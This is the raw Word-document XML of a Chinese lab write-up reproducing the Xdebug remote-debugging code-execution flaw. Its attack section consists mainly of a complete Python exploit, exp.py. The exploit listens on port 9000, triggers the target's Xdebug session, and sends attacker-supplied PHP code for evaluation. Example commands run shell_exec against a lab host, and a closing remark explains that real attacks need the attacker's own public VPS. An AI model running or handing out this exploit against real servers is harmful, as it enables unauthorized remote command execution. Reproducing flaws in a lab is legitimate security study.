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AE4" w:rsidRPr="00434DC1" w:rsidRDefault="00434DC1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00434DC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434DC1" w:rsidRDefault="00434DC1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434DC1" w:rsidRDefault="00434DC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DC1" w:rsidRPr="00434DC1" w:rsidRDefault="00434DC1" w:rsidP="00434DC1">
                            <w:r w:rsidRPr="00434DC1">
                              <w:t>docker-compose build</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00434DC1" w:rsidRDefault="00434DC1" w:rsidP="00434DC1">
                            <w:r w:rsidRPr="00434DC1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434DC1" w:rsidRPr="00434DC1" w:rsidRDefault="00434DC1" w:rsidP="00434DC1">
                      <w:r w:rsidRPr="00434DC1">
                        <w:t>docker-compose build</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00434DC1" w:rsidRDefault="00434DC1" w:rsidP="00434DC1">
                      <w:r w:rsidRPr="00434DC1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DC1" w:rsidRDefault="00434DC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问8</w:t>
      </w:r>
      <w:r>
        <w:t>080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，可以找到x</w:t>
      </w:r>
      <w:r>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置，可见开启了远程调试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434DC1" w:rsidRDefault="00434DC1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444B58F3" wp14:editId="7934679D">
            <wp:extent cx="5274310" cy="3568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C1" w:rsidRDefault="00434DC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00434DC1" w:rsidRPr="00434DC1" w:rsidRDefault="00434DC1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00434DC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434DC1" w:rsidRDefault="00434DC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、准备以下</w:t>
      </w:r>
      <w:r>
        <w:t>exp.py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#!/usr/bin/env python3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re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sys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time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requests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argparse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socket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base64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import binascii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from concurrent.futures import ThreadPoolExecutor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pool = ThreadPoolExecutor(1)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session = requests.session()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lastRenderedPageBreak/>
        <w:t>session.headers = {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'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'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}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def recv_xml(sock):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blocks = []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data = b''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while True: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try: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data = data + sock.recv(1024)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except socket.error as e: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break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if not data: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break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while data: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eop = data.find(b'\x00')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if eop &lt; 0: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    break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blocks.append(data[:eop])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data = data[eop+1:]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if len(blocks) &gt;= 4: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    break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return blocks[3]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def trigger(url):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time.sleep(2)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try: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session.get(url + '?XDEBUG_SESSION_START=phpstorm', timeout=0.1)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except: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pass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>if __name__ == '__main__':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parser = argparse.ArgumentParser(description='XDebug remote debug code execution.')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parser.add_argument('-c', '--code', required=True, help='the code you want to execute.')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parser.add_argument('-t', '--target', required=True, help='target url.')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parser.add_argument('-l', '--listen', default=9000, type=int, help='local port')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args = parser.parse_args()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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ip_port = ('0.0.0.0', args.listen)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sk = socket.socket()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sk.settimeout(10)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sk.bind(ip_port)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sk.listen(5)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pool.submit(trigger, args.target)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conn, addr = sk.accept()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conn.sendall(b''.join([b'eval -i 1 -- ', base64.b64encode(args.code.encode()), b'\x00']))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data = recv_xml(conn)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print('[+] Recieve data: ' + data.decode())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g = re.search(rb'&lt;\!\[CDATA\[([a-z0-9=\./\+]+)\]\]&gt;', data, re.I)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if not g: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print('[-] No result...')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sys.exit(0)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data = g.group(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434DC1" w:rsidRPr="00434DC1" w:rsidRDefault="00434DC1" w:rsidP="00434DC1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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try: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print('[+] Result: ' + base64.b64decode(data).decode())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except binascii.Error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434DC1" w:rsidRPr="00434DC1" w:rsidRDefault="00434DC1" w:rsidP="00434DC1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00434DC1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('[-] May be not string result...')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434DC1" w:rsidRDefault="00434DC1">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、执行脚本，实现任意命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434DC1" w:rsidRDefault="00434DC1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5275385" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="20955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5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DC1" w:rsidRDefault="00434DC1">
                            <w:r w:rsidRPr="00434DC1">
                              <w:t>python3 exp.py -t http://127.0.0.1:8080/index.php -c 'shell_exec('id');'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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00434DC1" w:rsidRDefault="00434DC1">
                      <w:r w:rsidRPr="00434DC1">
                        <w:t>python3 exp.py -t http://127.0.0.1:8080/index.php -c 'shell_exec('id');'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34DC1" w:rsidRDefault="00434DC1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10060509" wp14:editId="5E85A722">
            <wp:extent cx="5274310" cy="8439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79" w:rsidRDefault="00E47079">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、实战中</w:t>
      </w:r>
      <w:r>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:t>脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需</w:t>
      </w:r>
      <w:r>
        <w:t>使用自身</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VPS，</w:t>
      </w:r>
      <w:r>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:t>脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:t>时自动开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听本地9</w:t>
      </w:r>
      <w:r>
        <w:t>000端口，需要有公网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP或处于目标主机内网</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00E47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56C" w:rsidRDefault="0077556C" w:rsidP="00434DC1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0077556C" w:rsidRDefault="0077556C" w:rsidP="00434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56C" w:rsidRDefault="0077556C" w:rsidP="00434DC1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0077556C" w:rsidRDefault="0077556C" w:rsidP="00434D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D5"/>
    <w:rsid w:val="001F59D5"/>
    <w:rsid w:val="00434DC1"/>
    <w:rsid w:val="0077556C"/>
    <w:rsid w:val="008B5AE4"/>
    <w:rsid w:val="00E4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18A7A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7B00C8D5-45E2-4E0D-922E-676D8178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4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4D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4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4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2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2022-05-29T10:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T10:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>